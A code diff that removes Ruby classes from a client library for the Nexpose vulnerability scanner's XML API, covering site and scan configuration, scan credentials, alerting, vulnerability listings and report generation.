-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The Site ID
-  # site_id = -1 means create a new site. The NSC will assign a new site_id on SiteSave.
-  attr_reader :site_id
-  # A summary overview of this site
-  # SiteSummary Object
-  attr_reader :site_summary
-  # The configuration of this site
-  # SiteConfig Object
-  attr_reader :site_config
-  # The device listing for this site
-  # SiteDeviceListing Object
-  attr_reader :site_device_listing
-  # The scan history of this site
-  # SiteScanHistory Object
-  attr_reader :site_scan_history
-
-  def initialize(connection, site_id = -1)
-    @error = false
-    @connection = connection
-    @site_id = site_id
-
-    # If site_id > 0 then get SiteConfig
-    if (@site_id.to_i > 0)
-      # Create new SiteConfig object
-      @site_config = SiteConfig.new()
-      # Populate SiteConfig Obect with Data from the NSC
-      @site_config.getSiteConfig(@connection,@site_id)
-      @site_summary = SiteSummary.new(@site_id, @site_config.site_name, @site_config.description, @site_config.riskfactor)
-      @site_scan_history = SiteScanHistory.new(@connection,@site_id)
-      @site_device_listing = SiteDeviceListing.new(@connection,@site_id)
-
-    else
-      # Just in case user enters a number > -1 or = 0
-      @site_id = -1
-
-      @site_config = SiteConfig.new()
-      setSiteConfig("New Site " + rand(999999999999).to_s,"")
-      @site_summary = nil
-
-    end
-
-  end
-
-  # Creates a new site summary
-  def setSiteSummary(site_name, description, riskfactor = 1)
-    @site_summary = SiteSummary.new(-1,site_name,description,riskfactor)
-
-  end
-
-  # Creates a new site configuration
-  def setSiteConfig(site_name, description, riskfactor = 1)
-    setSiteSummary(site_name,description,riskfactor)
-    @site_config = SiteConfig.new()
-    @site_config._set_site_id(-1)
-    @site_config._set_site_name(site_name)
-    @site_config._set_description(description)
-    @site_config._set_riskfactor(riskfactor)
-    @site_config._set_scanConfig(ScanConfig.new(-1,"tmp","full-audit"))
-    @site_config._set_connection(@connection)
-
-  end
-
-  # Initiates a scan of this site. If successful returns scan_id and engine_id in an associative array. Returns false if scan is unsuccessful.
-  def scanSite()
-    r = @connection.execute('<SiteScanRequest session-id="' + "#{@connection.session_id}" + '" site-id="' + "#{@site_id}" + '"/>')
-    if(r.success)
-      res = {}
-      r.res.elements.each('//Scan/') do |s|
-        res[:scan_id]   = s.attributes['scan-id']
-        res[:engine_id] = s.attributes['engine-id']
-      end
-      return res
-    else
-      return false
-    end
-  end
-
-  # Saves this site in the NSC
-  def saveSite()
-    r = @connection.execute('<SiteSaveRequest session-id="' + @connection.session_id + '">' + getSiteXML() + ' </SiteSaveRequest>')
-    if (r.success)
-      @site_id =  r.attributes['site-id']
-      @site_config._set_site_id(@site_id)
-      @site_config.scanConfig._set_configID(@site_id)
-      @site_config.scanConfig._set_name(@site_id)
-      return true
-    else
-      return false
-    end
-  end
-
-  def deleteSite()
-    r = @connection.execute('<SiteDeleteRequest session-id="' + @connection.session_id.to_s + '" site-id="' + @site_id + '"/>')
-    r.success
-  end
-
-
-  def printSite()
-    puts "Site ID: " + @site_summary.id
-    puts "Site Name: " + @site_summary.site_name
-    puts "Site Description: " + @site_summary.description
-    puts "Site Risk Factor: " + @site_summary.riskfactor
-  end
-
-  def getSiteXML()
-
-    xml = '<Site id="' + "#{@site_config.site_id}" + '" name="' + "#{@site_config.site_name}" + '" description="' + "#{@site_config.description}" + '" riskfactor="' + "#{@site_config.riskfactor}" + '">'
-
-    xml << ' <Hosts>'
-    @site_config.hosts.each do |h|
-      xml << h.to_xml if h.respond_to? :to_xml
-    end
-    xml << '</Hosts>'
-
-    xml << '<Credentials>'
-    @site_config.credentials.each do |c|
-      xml << c.to_xml if c.respond_to? :to_xml
-    end
-    xml << ' </Credentials>'
-
-    xml << ' <Alerting>'
-    @site_config.alerts.each do |a|
-      xml << a.to_xml if a.respond_to? :to_xml
-    end
-    xml << ' </Alerting>'
-
-    xml << ' <ScanConfig configID="' + "#{@site_config.scanConfig.configID}" + '" name="' + "#{@site_config.scanConfig.name}" + '" templateID="' + "#{@site_config.scanConfig.templateID}" + '" configVersion="' + "#{@site_config.scanConfig.configVersion}" + '">'
-
-    xml << ' <Schedules>'
-    @site_config.scanConfig.schedules.each do |s|
-      xml << ' <Schedule enabled="' + s.enabled + '" type="' + s.type + '" interval="' + s.interval + '" start="' + s.start + '"/>'
-    end
-    xml << ' </Schedules>'
-
-    xml << ' <ScanTriggers>'
-    @site_config.scanConfig.scanTriggers.each do |s|
-
-      if s.kind_of?(Nexpose::AutoUpdate)
-        xml << ' <autoUpdate enabled="' + s.enabled + '" incremental="' + s.incremental + '"/>'
-      end
-    end
-
-    xml << ' </ScanTriggers>'
-
-    xml << ' </ScanConfig>'
-
-    xml << ' </Site>'
-
-    return xml
-  end
-end
-
-# === Description
-# Object that represents administrative credentials to be used during a scan. When retrived from an existing site configuration the credentials will be returned as a security blob and can only be passed back as is during a Site Save operation. This object can only be used to create a new set of credentials.
-#
-class AdminCredentials
-  # Security blob for an existing set of credentials
-  attr_reader :securityblob
-  # Designates if this object contains user defined credentials or a security blob
-  attr_reader :isblob
-  # The service for these credentials. Can be All.
-  attr_reader :service
-  # The host for these credentials. Can be Any.
-  attr_reader :host
-  # The port on which to use these credentials.
-  attr_reader :port
-  # The user id or username
-  attr_reader :userid
-  # The password
-  attr_reader :password
-  # The realm for these credentials
-  attr_reader :realm
-
-
-  def initialize(isblob = false)
-    @isblob = isblob
-  end
-
-  # Sets the credentials information for this object.
-  def setCredentials(service, host, port, userid, password, realm)
-    @isblob = false
-    @securityblob = nil
-    @service = service
-    @host = host
-    @port = port
-    @userid = userid
-    @password = password
-    @realm = realm
-  end
-
-  # TODO: add description
-  def setService(service)
-    @service = service
-  end
-
-  def setHost(host)
-    @host = host
-  end
-
-  # TODO: add description
-  def setBlob(securityblob)
-    @isblob = true
-    @securityblob = securityblob
-  end
-
-  include Sanitize
-  def to_xml
-    xml = ''
-    xml << '<adminCredentials'
-    xml << %Q{ service="#{replace_entities(service)}"} if (service)
-    xml << %Q{ userid="#{replace_entities(userid)}"} if (userid)
-    xml << %Q{ password="#{replace_entities(password)}"} if (password)
-    xml << %Q{ realm="#{replace_entities(realm)}"} if (realm)
-    xml << %Q{ host="#{replace_entities(host)}"} if (host)
-    xml << %Q{ port="#{replace_entities(port)}"} if (port)
-    xml << '>'
-    xml << replace_entities(securityblob) if (isblob)
-    xml << '</adminCredentials>'
-
-    xml
-  end
-end
-
-
-# === Description
-# Object that represents an SMTP (Email) Alert.
-#
-class SmtpAlert
-  # A unique name for this alert
-  attr_reader :name
-  # If this alert is enabled or not
-  attr_reader :enabled
-  # The email address of the sender
-  attr_reader :sender
-  # Limit the text for mobile devices
-  attr_reader :limitText
-  # Array containing Strings of email addresses
-  # Array of strings with the email addresses of the intended recipients
-  attr_reader :recipients
-  # The vulnerability filter to trigger the alert
-  attr_reader :vulnFilter
-  # The alert type
-  attr_reader :type
-
-  def initialize(name, sender, limitText, enabled = 1)
-    @type = :smtp
-    @name = name
-    @sender = sender
-    @enabled = enabled
-    @limitText = limitText
-    @recipients = Array.new()
-    # Sets default vuln filter - All Events
-    setVulnFilter(VulnFilter.new("50790400",1))
-  end
-
-  # Adds a new Recipient to the recipients array
-  def addRecipient(recipient)
-    @recipients.push(recipient)
-  end
-
-  # Sets the Vulnerability Filter for this alert.
-  def setVulnFilter(vulnFilter)
-    @vulnFilter = vulnFilter
-  end
-
-  include Sanitize
-  def to_xml
-    xml = "<smtpAlert"
-    xml << %Q{ name="#{replace_entities(name)}"}
-    xml << %Q{ enabled="#{replace_entities(enabled)}"}
-    xml << %Q{ sender="#{replace_entities(sender)}"}
-    xml << %Q{ limitText="#{replace_entities(limitText)}">}
-    recipients.each do |recpt|
-      xml << "<recipient>#{replace_entities(recpt)}</recipient>"
-    end
-    xml << vulnFilter.to_xml
-    xml << "</smtpAlert>"
-    xml
-  end
-end
-
-# === Description
-# Object that represents an SNMP Alert.
-#
-class SnmpAlert
-
-  # A unique name for this alert
-  attr_reader :name
-  # If this alert is enabled or not
-  attr_reader :enabled
-  # The community string
-  attr_reader :community
-  # The SNMP server to sent this alert
-  attr_reader :server
-  # The vulnerability filter to trigger the alert
-  attr_reader :vulnFilter
-  # The alert type
-  attr_reader :type
-
-  def initialize(name, community, server, enabled = 1)
-    @type = :snmp
-    @name = name
-    @community = community
-    @server = server
-    @enabled = enabled
-    # Sets default vuln filter - All Events
-    setVulnFilter(VulnFilter.new("50790400",1))
-  end
-
-  # Sets the Vulnerability Filter for this alert.
-  def setVulnFilter(vulnFilter)
-    @vulnFilter = vulnFilter
-  end
-
-  include Sanitize
-  def to_xml
-    xml = "<snmpAlert"
-    xml << %Q{ name="#{replace_entities(name)}"}
-    xml << %Q{ enabled="#{replace_entities(enabled)}"}
-    xml << %Q{ community="#{replace_entities(community)}"}
-    xml << %Q{ server="#{replace_entities(server)}">}
-    xml << vulnFilter.to_xml
-    xml << "</snmpAlert>"
-    xml
-  end
-
-end
-
-# === Description
-# Object that represents a Syslog Alert.
-#
-class SyslogAlert
-
-  # A unique name for this alert
-  attr_reader :name
-  # If this alert is enabled or not
-  attr_reader :enabled
-  # The Syslog server to sent this alert
-  attr_reader :server
-  # The vulnerability filter to trigger the alert
-  attr_reader :vulnFilter
-  # The alert type
-  attr_reader :type
-
-  def initialize(name, server, enabled = 1)
-    @type = :syslog
-    @name = name
-    @server = server
-    @enabled = enabled
-    # Sets default vuln filter - All Events
-    setVulnFilter(VulnFilter.new("50790400",1))
-
-  end
-
-  # Sets the Vulnerability Filter for this alert.
-  def setVulnFilter(vulnFilter)
-    @vulnFilter = vulnFilter
-  end
-
-  include Sanitize
-  def to_xml
-    xml = "<syslogAlert"
-    xml << %Q{ name="#{replace_entities(name)}"}
-    xml << %Q{ enabled="#{replace_entities(enabled)}"}
-    xml << %Q{ server="#{replace_entities(server)}">}
-    xml << vulnFilter.to_xml
-    xml << "</syslogAlert>"
-    xml
-  end
-
-end
-
-# TODO: review
-# <scanFilter scanStop='0' scanFailed='0' scanStart='1'/>
-# === Description
-#
-class ScanFilter
-
-  attr_reader :scanStop
-  attr_reader :scanFailed
-  attr_reader :scanStart
-
-  def initialize(scanstop, scanFailed, scanStart)
-
-    @scanStop = scanStop
-    @scanFailed = scanFailed
-    @scanStart = scanStart
-
-  end
-
-end
-
-# TODO: review
-# === Description
-#
-class VulnFilter
-
-  attr_reader :typeMask
-  attr_reader :maxAlerts
-  attr_reader :severityThreshold
-
-  def initialize(typeMask, severityThreshold, maxAlerts = -1)
-    @typeMask = typeMask
-    @maxAlerts = maxAlerts
-    @severityThreshold = severityThreshold
-  end
-
-  include Sanitize
-  def to_xml
-    xml = "<vulnFilter "
-    xml << %Q{ typeMask="#{replace_entities(typeMask)}"}
-    xml << %Q{ maxAlerts="#{replace_entities(maxAlerts)}"}
-    xml << %Q{ severityThreshold="#{replace_entities(severityThreshold)}"}
-    xml << "/>"
-
-    xml
-  end
-
-end
-
-# TODO add engineID
-# === Description
-# Object that represents the scanning configuration for a Site.
-#
-class ScanConfig
-  # A unique ID for this scan configuration
-  attr_reader :configID
-  # The name of the scan template
-  attr_reader :name
-  # The ID of the scan template used full-audit, exhaustive-audit, web-audit, dos-audit, internet-audit, network-audit
-  attr_reader :templateID
-  # The configuration version (default is 2)
-  attr_reader :configVersion
-  # Array of (Schedule)*
-  attr_reader :schedules
-  # Array of (ScanTrigger)*
-  attr_reader :scanTriggers
-
-  def initialize(configID, name, templateID, configVersion = 2)
-
-    @configID = configID
-    @name = name
-    @templateID = templateID
-    @configVersion = configVersion
-    @schedules = Array.new()
-    @scanTriggers = Array.new()
-
-  end
-
-  # Adds a new Schedule for this ScanConfig
-  def addSchedule(schedule)
-    @schedules.push(schedule)
-  end
-
-  # Adds a new ScanTrigger to the scanTriggers array
-  def addScanTrigger(scanTrigger)
-    @scanTriggers.push(scanTrigger)
-  end
-
-  def _set_configID(configID)
-    @configID = configID
-  end
-
-  def _set_name(name)
-    @name = name
-  end
-
-end
-
-# === Description
-# Object that holds a scan schedule
-#
-class Schedule
-  # Type of Schedule (daily|hourly|monthly|weekly)
-  attr_reader :type
-  # The schedule interval
-  attr_reader :interval
-  # The date and time to start the first scan
-  attr_reader :start
-  # Enable or disable this schedule
-  attr_reader :enabled
-  # The date and time to disable to schedule. If null then the schedule will run forever.
-  attr_reader :notValidAfter
-  # Scan on the same date each time
-  attr_reader :byDate
-
-  def initialize(type, interval, start, enabled = 1)
-
-    @type = type
-    @interval = interval
-    @start = start
-    @enabled = enabled
-
-  end
-
-
-
-end
-
-# === Description
-# Object that holds an event that triggers the start of a scan.
-#
-class ScanTrigger
-  # Type of Trigger (AutoUpdate)
-  attr_reader :type
-  # Enable or disable this scan trigger
-  attr_reader :enabled
-  # Sets the trigger to start an incremental scan or a full scan
-  attr_reader :incremental
-
-  def initialize(type, incremental, enabled = 1)
-
-    @type = type
-    @incremental = incremental
-    @enabled = enabled
-
-  end
-
-end
-
-# === Description
-# Object that represents a single device in an NSC.
-#
-class Device
-
-  # A unique device ID (assigned by the NSC)
-  attr_reader :id
-  # The site ID of this devices site
-  attr_reader :site_id
-  # IP Address or Hostname of this device
-  attr_reader :address
-  # User assigned risk multiplier
-  attr_reader :riskfactor
-  # Nexpose risk score
-  attr_reader :riskscore
-
-  def initialize(id, site_id, address, riskfactor=1, riskscore=0)
-    @id = id
-    @site_id = site_id
-    @address = address
-    @riskfactor = riskfactor
-    @riskscore = riskscore
-
-  end
-
-end
-
-
-# === Description
-# Object that represents a summary of a scan.
-#
-class ScanSummary
-  # The Scan ID of the Scan
-  attr_reader :scan_id
-  # The Engine ID used to perform the scan
-  attr_reader :engine_id
-  # TODO: add description
-  attr_reader :name
-  # The scan start time
-  attr_reader :startTime
-  # The scan finish time
-  attr_reader :endTime
-  # The scan status (running|finished|stopped|error| dispatched|paused|aborted|uknown)
-  attr_reader :status
-  # The number of pending tasks
-  attr_reader :tasks_pending
-  # The number of active tasks
-  attr_reader :tasks_active
-  # The number of completed tasks
-  attr_reader :tasks_completed
-  # The number of "live" nodes
-  attr_reader :nodes_live
-  # The number of "dead" nodes
-  attr_reader :nodes_dead
-  # The number of filtered nodes
-  attr_reader :nodes_filtered
-  # The number of unresolved nodes
-  attr_reader :nodes_unresolved
-  # The number of "other" nodes
-  attr_reader :nodes_other
-  # Confirmed vulnerabilities found (indexed by severity)
-  # Associative array, indexed by severity
-  attr_reader :vuln_exploit
-  # Unconfirmed vulnerabilities found (indexed by severity)
-  # Associative array, indexed by severity
-  attr_reader :vuln_version
-  # Not vulnerable checks run (confirmed)
-  attr_reader :not_vuln_exploit
-  # Not vulnerable checks run (unconfirmed)
-  attr_reader :not_vuln_version
-  # Vulnerability check errors
-  attr_reader :vuln_error
-  # Vulnerability checks disabled
-  attr_reader :vuln_disabled
-  # Vulnerability checks other
-  attr_reader :vuln_other
-
-  # Constructor
-  # ScanSummary(can_id, $engine_id, $name, tartTime, $endTime, tatus)
-  def initialize(scan_id, engine_id, name, startTime, endTime, status)
-
-    @scan_id = scan_id
-    @engine_id = engine_id
-    @name = name
-    @startTime = startTime
-    @endTime = endTime
-    @status = status
-
-  end
-
-end
-
-# TODO
-# === Description
-# Object that represents the overview statistics for a particular scan.
-#
-# === Examples
-#
-#   # Create a new Nexpose Connection on the default port and Login
-#   nsc = Connection.new("10.1.40.10","nxadmin","password")
-#   nsc.login()
-#
-#   # Get a Site (Site ID = 12) from the NSC
-#   site = new Site(nsc,12)
-#
-#   # Start a Scan of this site and pause for 1 minute
-#   scan1 = site.scanSite()
-#   sleep(60)
-#
-#   # Get the Scan Statistics for this scan
-#   scanStatistics = new ScanStatistics(nsc,scan1["scan_id"])
-#
-#   # Print out number of confirmed vulnerabilities with a 10 severity
-#   puts scanStatistics.scansummary.vuln_exploit[10]
-#
-#   # Print out the number of pending tasks left in the scan
-#   puts scanStatistics.scan_summary.tasks_pending
-#
-class ScanStatistics
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :reseponse_xml
-  # The Scan ID
-  attr_reader :scan_id
-  # The ScanSummary of the scan
-  attr_reader :scan_summary
-  # The NSC Connection associated with this object
-  attr_reader :connection
-
-  # Vulnerability checks other
-  attr_reader :vuln_other
-  def initialize(connection, scan_id)
-    @error = false
-    @connection = connection
-    @scan_id = scan_id
-  end
-end
-
-# ==== Description
-# Object that represents a listing of all of the scan engines available on to an NSC.
-#
-class EngineListing
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # Array containing (EngineSummary*)
-  attr_reader :engines
-  # The number of scan engines
-  attr_reader :engine_count
-
-  # Constructor
-  # EngineListing (connection)
-  def initialize(connection)
-    @connection = connection
-  end
-end
-
-# ==== Description
-# Object that represents the summary of a scan engine.
-#
-# ==== Examples
-#
-#   # Create a new Nexpose Connection on the default port and Login
-#   nsc = Connection.new("10.1.40.10","nxadmin","password")
-#   nsc.login()
-#
-#   # Get the engine listing for the connection
-#   enginelisting = EngineListing.new(nsc)
-#
-#   # Print out the status of the first scan engine
-#   puts enginelisting.engines[0].status
-#
-class EngineSummary
-  # A unique ID that identifies this scan engine
-  attr_reader :id
-  # The name of this scan engine
-  attr_reader :name
-  # The hostname or IP address of the engine
-  attr_reader :address
-  # The port there the engine is listening
-  attr_reader :port
-  # The engine status (active|pending-auth| incompatible|not-responding|unknown)
-  attr_reader :status
-
-  # Constructor
-  # EngineSummary(id, name, address, port, status)
-  def initialize(id, name, address, port, status)
-    @id = id
-    @name = name
-    @address = address
-    @port = port
-    @status = status
-  end
-
-end
-
-
-# TODO
-class EngineActivity
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The Engine ID
-  attr_reader :engine_id
-  # Array containing (ScanSummary*)
-  attr_reader :scan_summaries
-
-
-end
-
-# === Description
-# Object that represents a listing of all of the vulnerabilities in the vulnerability database
-#
-class VulnerabilityListing
-
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # Array containing (VulnerabilitySummary*)
-  attr_reader :vulnerability_summaries
-  # The number of vulnerability definitions
-  attr_reader :vulnerability_count
-
-  # Constructor
-  # VulnerabilityListing(connection)
-  def initialize(connection)
-    @error = false
-    @vulnerability_summaries = []
-    @connection = connection
-
-    r = @connection.execute('<VulnerabilityListingRequest session-id="' + @connection.session_id + '"/>')
-
-    if (r.success)
-      r.res.elements.each('VulnerabilityListingResponse/VulnerabilitySummary') do |v|
-        @vulnerability_summaries.push(VulnerabilitySummary.new(v.attributes['id'],v.attributes["title"],v.attributes["severity"]))
-      end
-    else
-      @error = true
-      @error_msg = 'VulnerabilitySummaryRequest Parse Error'
-    end
-    @vulnerability_count = @vulnerability_summaries.length
-  end
-end
-
-# === Description
-# Object that represents the summary of an entry in the vulnerability database
-#
-class VulnerabilitySummary
-
-  # The unique ID string for this vulnerability
-  attr_reader :id
-  # The title of this vulnerability
-  attr_reader :title
-  # The severity of this vulnerability (1 – 10)
-  attr_reader :severity
-
-  # Constructor
-  # VulnerabilitySummary(id, title, severity)
-  def initialize(id, title, severity)
-    @id = id
-    @title = title
-    @severity = severity
-
-  end
-
-end
-
-# === Description
-#
-class Reference
-
-  attr_reader :source
-  attr_reader :reference
-
-  def initialize(source, reference)
-    @source = source
-    @reference = reference
-  end
-end
-
-# === Description
-# Object that represents the details for an entry in the vulnerability database
-#
-class VulnerabilityDetail
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The unique ID string for this vulnerability
-  attr_reader :id
-  # The title of this vulnerability
-  attr_reader :title
-  # The severity of this vulnerability (1 – 10)
-  attr_reader :severity
-  # The pciSeverity of this vulnerability
-  attr_reader :pciSeverity
-  # The CVSS score of this vulnerability
-  attr_reader :cvssScore
-  # The CVSS vector of this vulnerability
-  attr_reader :cvssVector
-  # The date this vulnerability was published
-  attr_reader :published
-  # The date this vulnerability was added to Nexpose
-  attr_reader :added
-  # The last date this vulnerability was modified
-  attr_reader :modified
-  # The HTML Description of this vulnerability
-  attr_reader :description
-  # External References for this vulnerability
-  # Array containing (Reference)
-  attr_reader :references
-  # The HTML Solution for this vulnerability
-  attr_reader :solution
-
-  # Constructor
-  # VulnerabilityListing(connection,id)
-  def initialize(connection, id)
-
-    @error = false
-    @connection = connection
-    @id = id
-    @references = []
-
-    r = @connection.execute('<VulnerabilityDetailsRequest session-id="' + @connection.session_id + '" vuln-id="' + @id + '"/>')
-
-    if (r.success)
-      r.res.elements.each('VulnerabilityDetailsResponse/Vulnerability') do |v|
-        @id = v.attributes['id']
-        @title = v.attributes["title"]
-        @severity = v.attributes["severity"]
-        @pciSeverity = v.attributes['pciSeverity']
-        @cvssScore = v.attributes['cvssScore']
-        @cvssVector = v.attributes['cvssVector']
-        @published = v.attributes['published']
-        @added = v.attributes['added']
-        @modified = v.attributes['modified']
-
-        v.elements.each('description') do |d|
-          @description = d.to_s.gsub(/\<\/?description\>/i, '')
-        end
-
-        v.elements.each('solution') do |s|
-          @solution = s.to_s.gsub(/\<\/?solution\>/i, '')
-        end
-
-        v.elements.each('references/reference') do |r|
-          @references.push(Reference.new(r.attributes['source'],r.text))
-        end
-      end
-    else
-      @error = true
-      @error_msg = 'VulnerabilitySummaryRequest Parse Error'
-    end
-
-  end
-end
-
-# === Description
-# Object that represents the summary of a Report Configuration.
-#
-class ReportConfigSummary
-  # The Report Configuration ID
-  attr_reader :id
-  # A unique name for the Report
-  attr_reader :name
-  # The report format
-  attr_reader :format
-  # The date of the last report generation
-  attr_reader :last_generated_on
-  # Relative URI of the last generated report
-  attr_reader :last_generated_uri
-
-  # Constructor
-  # ReportConfigSummary(id, name, format, last_generated_on, last_generated_uri)
-  def initialize(id, name, format, last_generated_on, last_generated_uri)
-
-    @id = id
-    @name = name
-    @format = format
-    @last_generated_on = last_generated_on
-    @last_generated_uri = last_generated_uri
-
-  end
-
-end
-
-# === Description
-# Object that represents the schedule on which to automatically generate new reports.
-class ReportHistory
-
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The report definition (report config) ID
-  # Report definition ID
-  attr_reader :config_id
-  # Array (ReportSummary*)
-  attr_reader :report_summaries
-
-
-  def initialize(connection, config_id)
-
-    @error = false
-    @connection = connection
-    @config_id = config_id
-    @report_summaries = []
-
-    reportHistory_request = APIRequest.new('<ReportHistoryRequest session-id="' + "#{connection.session_id}" + '" reportcfg-id="' + "#{@config_id}" + '"/>',@connection.geturl())
-    reportHistory_request.execute()
-    @response_xml = reportHistory_request.response_xml
-    @request_xml = reportHistory_request.request_xml
-
-  end
-
-  def xml_parse(response)
-    response = REXML::Document.new(response.to_s)
-    status =  response.root.attributes['success']
-    if (status == '1')
-      response.elements.each('ReportHistoryResponse/ReportSummary') do |r|
-        @report_summaries.push(ReportSummary.new(r.attributes["id"], r.attributes["cfg-id"], r.attributes["status"], r.attributes["generated-on"],r.attributes['report-uri']))
-      end
-    else
-      @error = true
-      @error_msg = 'Error ReportHistoryReponse'
-    end
-  end
-
-end
-
-# === Description
-# Object that represents the summary of a single report.
-class ReportSummary
-
-  # The Report ID
-  attr_reader :id
-  # The Report Configuration ID
-  attr_reader :cfg_id
-  # The status of this report
-  # available | generating | failed
-  attr_reader :status
-  # The date on which this report was generated
-  attr_reader :generated_on
-  # The relative URI of the report
-  attr_reader :report_uri
-
-  def initialize(id, cfg_id, status, generated_on, report_uri)
-
-    @id = id
-    @cfg_id = cfg_id
-    @status = status
-    @generated_on = generated_on
-    @report_uri = report_uri
-
-  end
-
-end
-
-# === Description
-#
-  class ReportAdHoc
-    include XMLUtils
-
-    attr_reader :error
-    attr_reader :error_msg
-    attr_reader :connection
-    # Report Template ID strong e.g. full-audit
-    attr_reader :template_id
-    # pdf|html|xml|text|csv|raw-xml-v2
-    attr_reader :format
-    # Array of (ReportFilter)*
-    attr_reader :filters
-    attr_reader :request_xml
-    attr_reader :response_xml
-    attr_reader :report_decoded
-
-
-    def initialize(connection, template_id = 'full-audit', format = 'raw-xml-v2')
-
-      @error = false
-      @connection = connection
-      @filters = Array.new()
-      @template_id = template_id
-      @format = format
-
-    end
-
-    def addFilter(filter_type, id)
-
-      # filter_type can be site|group|device|scan
-      # id is the ID number. For scan, you can use 'last' for the most recently run scan
-      filter = ReportFilter.new(filter_type, id)
-      filters.push(filter)
-
-    end
-
-    def generate()
-      request_xml = '<ReportAdhocGenerateRequest session-id="' + @connection.session_id + '">'
-      request_xml += '<AdhocReportConfig template-id="' + @template_id + '" format="' + @format + '">'
-      request_xml += '<Filters>'
-      @filters.each do |f|
-        request_xml += '<filter type="' + f.type + '" id="'+ f.id.to_s + '"/>'
-      end
-      request_xml += '</Filters>'
-      request_xml += '</AdhocReportConfig>'
-      request_xml += '</ReportAdhocGenerateRequest>'
-
-      ad_hoc_request = APIRequest.new(request_xml, @connection.url)
-      ad_hoc_request.execute()
-
-      content_type_response = ad_hoc_request.raw_response.header['Content-Type']
-      if content_type_response =~ /multipart\/mixed;\s*boundary=([^\s]+)/
-        # Nexpose sends an incorrect boundary format which breaks parsing
-        # Eg: boundary=XXX; charset=XXX
-        # Fix by removing everything from the last semi-colon onward
-        last_semi_colon_index = content_type_response.index(/;/, content_type_response.index(/boundary/))
-        content_type_response = content_type_response[0, last_semi_colon_index]
-
-        data = "Content-Type: " + content_type_response + "\r\n\r\n" + ad_hoc_request.raw_response_data
-        doc = Rex::MIME::Message.new data
-        doc.parts.each do |part|
-          if /.*base64.*/ =~ part.header.to_s
-            return parse_xml(part.content.unpack("m*")[0])
-          end
-        end
-      end
-    end
-
-  end
-
-# === Description
-# Object that represents the configuration of a report definition.
-#
-class ReportConfig
-
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The ID for this report definition
-  attr_reader :config_id
-  # A unique name for this report definition
-  attr_reader :name
-  # The template ID used for this report definition
-  attr_reader :template_id
-  # html, db, txt, xml, raw-xml-v2, csv, pdf
-  attr_reader :format
-  # XXX new
-  attr_reader :timezone
-  # XXX new
-  attr_reader :owner
-  # Array of (ReportFilter)* - The Sites, Asset Groups, or Devices to run the report against
-  attr_reader :filters
-  # Automatically generate a new report at the conclusion of a scan
-  # 1 or 0
-  attr_reader :generate_after_scan
-  # Schedule to generate reports
-  # ReportSchedule Object
-  attr_reader :schedule
-  # Store the reports on the server
-  # 1 or 0
-  attr_reader :storeOnServer
-  # Location to store the report on the server
-  attr_reader :store_location
-  # Form to send the report via email
-  # "file", "zip", "url", or NULL (don’t send email)
-  attr_reader :email_As
-  # Send the Email to all Authorized Users
-  # boolean - Send the Email to all Authorized Users
-  attr_reader :email_to_all
-  # Array containing the email addresses of the recipients
-  attr_reader :email_recipients
-  # IP Address or Hostname of SMTP Relay Server
-  attr_reader :smtp_relay_server
-  # Sets the FROM field of the Email
-  attr_reader :sender
-  # TODO
-  attr_reader :db_export
-  # TODO
-  attr_reader :csv_export
-  # TODO
-  attr_reader :xml_export
-
-
-  def initialize(connection, config_id = -1)
-
-    @error = false
-    @connection = connection
-    @config_id = config_id
-    @xml_tag_stack = Array.new()
-    @filters = Array.new()
-    @email_recipients = Array.new()
-    @name = "New Report " + rand(999999999).to_s
-
-    r = @connection.execute('<ReportConfigRequest session-id="' + @connection.session_id.to_s + '" reportcfg-id="' + @config_id.to_s + '"/>')
-    if (r.success)
-      r.res.elements.each('ReportConfigResponse/ReportConfig') do |r|
-        @name = r.attributes['name']
-        @format = r.attributes['format']
-        @timezone = r.attributes['timezone']
-        @id = r.attributes['id']
-        @template_id = r.attributes['template-id']
-        @owner = r.attributes['owner']
-      end
-    else
-      @error = true
-      @error_msg = 'Error ReportHistoryReponse'
-    end
-  end
-
-  # === Description
-  # Generate a new report on this report definition. Returns the new report ID.
-  def generateReport(debug = false)
-    return generateReport(@connection, @config_id, debug)
-  end
-
-  # === Description
-  # Save the report definition to the NSC.
-  # Returns the config-id.
-  def saveReport()
-    r = @connection.execute('<ReportSaveRequest session-id="' + @connection.session_id.to_s + '">' + getXML().to_s + ' </ReportSaveRequest>')
-    if(r.success)
-      @config_id = r.attributes['reportcfg-id']
-      return true
-    end
-    return false
-  end
-
-  # === Description
-  # Adds a new filter to the report config
-  def addFilter(filter_type, id)
-    filter = ReportFilter.new(filter_type,id)
-    @filters.push(filter)
-  end
-
-  # === Description
-  # Adds a new email recipient
-  def addEmailRecipient(recipient)
-    @email_recipients.push(recipient)
-  end
-
-  # === Description
-  # Sets the schedule for this report config
-  def setSchedule(schedule)
-    @schedule = schedule
-  end
-
-  def getXML()
-
